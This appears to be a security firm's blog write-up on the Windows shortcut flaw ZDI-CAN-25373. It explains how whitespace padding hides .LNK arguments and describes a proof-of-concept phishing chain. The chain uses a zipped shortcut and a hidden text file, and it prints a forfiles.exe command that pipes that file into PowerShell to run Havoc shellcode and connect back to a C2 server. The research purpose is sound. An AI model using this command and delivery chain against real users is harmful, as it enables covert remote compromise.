From Shortcut to Shell - Weaponising ZDI-CAN-25373 for Initial Access

# From Shortcut to Shell: Weaponising ZDI-CAN-25373 for Initial Access One of the latest vulnerabilities disclosed by Trend Micro’s Zero Day Initiative, ZDI-CAN-25373, reveals a critical flaw in how Windows processes shortcut (.LNK) files. This zero-day allows attackers to embed and execute malicious commands while completely concealing the payload from traditional inspection methods. Unlike earlier LNK-based attacks—where malicious behaviour could often be identified by examining shortcut properties—this exploit leverages a previously unknown mechanism that makes detection and analysis far more difficult for defenders. It highlights how a legitimate Windows feature is once again being weaponised for stealthy initial access. --- ## Overview Windows shortcut (.lnk) files are an integral feature of the Windows operating system, designed to provide convenient access to applications, folders, and scripts. While inherently benign, their flexibility has long made them an attractive tool for attackers. Over the years, adversaries have increasingly leveraged .lnk files as an initial access vector—often embedding commands to launch malicious scripts via PowerShell, CMD, or Wscript. These shortcuts can be disguised with deceptive icons and filenames, enabling them to bypass casual scrutiny even without exploiting a specific vulnerability. What sets ZDI-CAN-25373 apart is its ability to completely obscure the embedded payload, even from manual inspection of shortcut properties. This is achieved by padding the malicious command with non-printable whitespace characters—such as Space (0x20), Tab (0x09), Line Feed (0x0A), Vertical Tab (0x0B), Form Feed (0x0C), and Carriage Return (0x0D). These characters render the payload effectively invisible to both users and many defensive tools, significantly complicating detection and analysis. --- ## Technical Breakdown At the core of ZDI-CAN-25373 is a logic flaw in how Windows parses command-line arguments embedded within .lnk (shortcut) files. Normally, when a .lnk file is created, any command specified in the "Target" or "Arguments" field is visible in the file’s metadata and can be viewed using GUI tools or forensic parsers. This transparency allows defenders to inspect and identify suspicious behaviour. However, ZDI-CAN-25373 exploits the Windows Shell’s handling of whitespace characters—specifically non-printable control characters—to embed commands in a way that obscures the payload entirely. These characters are ignored by the parser during execution but are not rendered or visible in standard UI tools or basic hex inspection. ![[Pasted image 20250723214836.png]] *Figure 1 - Malicious LNK file Properties* --- ## How it works ### .LNK File Structure Manipulation: A .lnk file follows a structured binary format composed of several headers and optional data blocks that define its behaviour and appearance. One of the most critical fields within this structure is the COMMAND_LINE_ARGUMENTS field, which specifies the arguments that are passed to the target executable—such as cmd.exe, powershell.exe, or wscript.exe. This field is often leveraged in malicious .lnk files to deliver and execute arbitrary commands on a victim's system. ### Payload Obfuscation: To exploit the vulnerability, the attacker deliberately crafts the COMMAND_LINE_ARGUMENTS field within the .lnk file to include a malicious payload—typically a command designed to execute a script or download a second-stage payload. This payload might involve the use of powershell.exe, cmd.exe, or another interpreter to run arbitrary code. To evade detection, the attacker then obscures the payload by inserting non-printable whitespace characters throughout the command string. These characters include 0x20 (Space), 0x0A (Line Feed), 0x09 (Horizontal Tab), and others such as 0x0B (Vertical Tab) or 0x0D (Carriage Return). While invisible in most file inspection tools, these characters are ignored by the Windows Shell during execution—allowing the command to run as intended without revealing its true contents during static analysis. By analysing the malicious .lnk file with Eric Zimmerman's LECmd tool, we can inspect its properties and observe the presence of non-printable whitespace characters that are used to conceal the actual command from plain view. ![[Pasted image 20250723214858.png]] *Figure 2 - Inspecting the malicious LNK file with LECmd tool* --- ## Execution Behaviour: Despite the obfuscation, Windows Shell parses the command-line arguments correctly at runtime, seamlessly ignoring the embedded whitespace characters. As a result, the malicious payload is executed exactly as intended, often without raising any user interface warnings or triggering detection by antivirus or EDR solutions. This stealthy execution pathway makes the exploit particularly dangerous, as it allows attackers to bypass traditional security layers while using nothing more than a crafted .lnk file. --- ## Working Proof of Concept At CCL, we developed a working proof of concept leveraging the LNK file vulnerability to demonstrate how an attacker could achieve initial access. By utilising the built-in Windows binary forfiles.exe, we configured the .lnk file to proxy the execution of malicious commands, triggered only upon the successful execution of a seemingly benign command. To deliver the payload, we packaged the .lnk file alongside a “hidden” text file within a .zip archive and sent it to the target. For added stealth, the shortcut was designed with a legitimate-looking icon, making it appear harmless and increasing the likelihood of user interaction. ![[Pasted image 20250723214917.png]] *Figure 3 - ZIP file with malicious LNK file and hidden text file* In this scenario, the .lnk file leverages the built-in Windows utility forfiles.exe, a well-known Living-off-the-Land Binary (LOLBIN), to execute the embedded command when the user interacts with the shortcut. To evade detection, the command within the COMMAND_LINE_ARGUMENTS field is obfuscated using the previously described whitespace padding technique, allowing the payload to remain hidden from standard inspection tools while still executing as intended. The command searches the current directory, when it finds a .txt file in then executes PowerShell to pass the contents of the hidden text file to PowerShell for execution. ``` C:\Windows\system32\forfiles.exe /P . /M *.txt /C "powershell -c type %USERPROFILE%\Downloads\Havoc\1.txt | powershell -Command -" ``` The accompanying text file contains a PowerShell script that holds encrypted Havoc shellcode, designed to spawn a Demon agent and establish a connection back to our C2 server. This approach aids in bypassing EDR solutions, as the .lnk file itself does not initiate any external network connections—an activity often flagged as a potential indicator of compromise (IOC). By decoupling the initial access vector from the payload delivery, the attack chain becomes more stealthy and less likely to trigger immediate suspicion. ![[Pasted image 20250723215241.png]] *Figure 4 – Hidden text file with PowerShell script* Once a convincing pretext is in place and the .zip file is successfully delivered to the target, the user is enticed to open the seemingly harmless .lnk file. Upon execution, the obfuscated command within the shortcut silently triggers the payload, ultimately establishing a command-and-control (C2) connection over the internet to our Havoc server. This seamless and stealthy interaction enables the attacker to gain remote access without raising immediate red flags. ![[Pasted image 20250723215316.png]] *Figure 5 - Extracted folder and content users will see as .txt file is hidden* The image below shows a successful connection from the compromised host to our externally hosted Havoc Team Server, confirming that the malicious .lnk file executed as intended and the encrypted shellcode successfully spawned a Demon agent. This connection provides the attacker with full command-and-control capabilities, enabling further actions such as privilege escalation, persistence, and lateral movement—depending on the objectives of the engagement. The stealthy nature of the initial access, combined with the lack of obvious indicators, highlights the effectiveness of this technique in bypassing traditional security controls. ![[Pasted image 20250723215959.png]] *Figure 6 - Successful connection* --- ## Conclusion ZDI-CAN-25373 demonstrates how even long-standing, trusted Windows features like .lnk files can be subverted by attackers to gain stealthy initial access. The ability to embed and execute obfuscated payloads without detection significantly raises the risk posed by malicious shortcut files, especially when paired with LOLBINs and encrypted payloads.